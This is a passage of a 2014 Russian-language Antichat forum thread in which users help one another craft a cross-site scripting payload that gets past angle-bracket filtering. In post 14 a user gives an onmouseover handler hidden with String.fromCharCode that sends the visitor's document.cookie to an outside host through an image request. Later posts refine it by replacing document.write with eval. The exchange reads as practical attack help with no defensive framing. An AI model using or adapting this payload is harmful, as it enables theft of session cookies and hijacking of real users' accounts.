HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 11.02.2014, 20:56
Seller Zeus
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076

Репутация: 0
По умолчанию

Цитата:
Сообщение от psihoz26  
попробуй кормить скрипту ссылку на js файл в котором и будет нужный код
Через document.location.href?
 
Ответить с цитированием

  #12  
Старый 12.02.2014, 16:23
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
Провел на форуме:
182660

Репутация: 324


По умолчанию

Цитата:
Сообщение от Seller Zeus  
Seller Zeus said:
Через document.location.href?
Зачем?

http://example.com/script.js замени на адрес своего js файла
 
Ответить с цитированием

  #13  
Старый 12.02.2014, 16:24
Seller Zeus
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076

Репутация: 0
По умолчанию

Цитата:
Сообщение от psihoz26  
Зачем?

http://example.com/script.js замени на адрес своего js файла
угловые скобки фильтруются...
 
Ответить с цитированием

  #14  
Старый 12.02.2014, 19:15
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349

Репутация: 45
По умолчанию

А на это как реагирует ?

Код:
onmouseover=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,107,114,105,114,109,105,110,97,108,97,46,110,101,116,47,115,110,102,47,115,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62));
ЗЫ: Там

Код:
img=new Image();img.src="http://krirminala.net/snf/s.gif?"+document.cookie;
 
Ответить с цитированием

  #15  
Старый 13.02.2014, 18:11
Seller Zeus
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
А на это как реагирует ?
Код:
onmouseover=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,107,114,105,114,109,105,110,97,108,97,46,110,101,116,47,115,110,102,47,115,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62));
ЗЫ: Там
Код:
img=new Image();img.src="http://site.net/snf/s.gif?"+document.cookie;
Спасибо, а как сделать чтобы на пустую страницу не редеректило?
 
Ответить с цитированием

  #16  
Старый 13.02.2014, 20:26
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349

Репутация: 45
По умолчанию

document.write убрать и далее снова перекодировать js, без тегов script и собственно, евалить. Но в этом случаи, как ранее говорилось, запрос придёт в негодность ?
 
Ответить с цитированием

  #17  
Старый 13.02.2014, 20:28
Seller Zeus
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
document.write убрать и далее снова перекодировать js, без тегов script и собственно, евалить. Но в этом случаи, как ранее говорилось, запрос придёт в негодность ?
Ну так он и щас без тегов script.
 
Ответить с цитированием

  #18  
Старый 13.02.2014, 20:31
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349

Репутация: 45
По умолчанию

Эти теги закатаны в String.fromCharCode и далее записываются на страницу.
 
Ответить с цитированием

  #19  
Старый 13.02.2014, 20:32
Seller Zeus
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076

Репутация: 0
По умолчанию

Цитата:
Сообщение от Inoms  
Эти теги закатаны в String.fromCharCode и далее записываются на страницу.
Вообщем вы предлагаете вместо document.write написать eval(); ?
 
Ответить с цитированием

  #20  
Старый 13.02.2014, 20:42
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349

Репутация: 45
По умолчанию

Если этого не сделать, всё то, что вернет String.fromCharCode будет текст, который даже нигде не будет показан)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.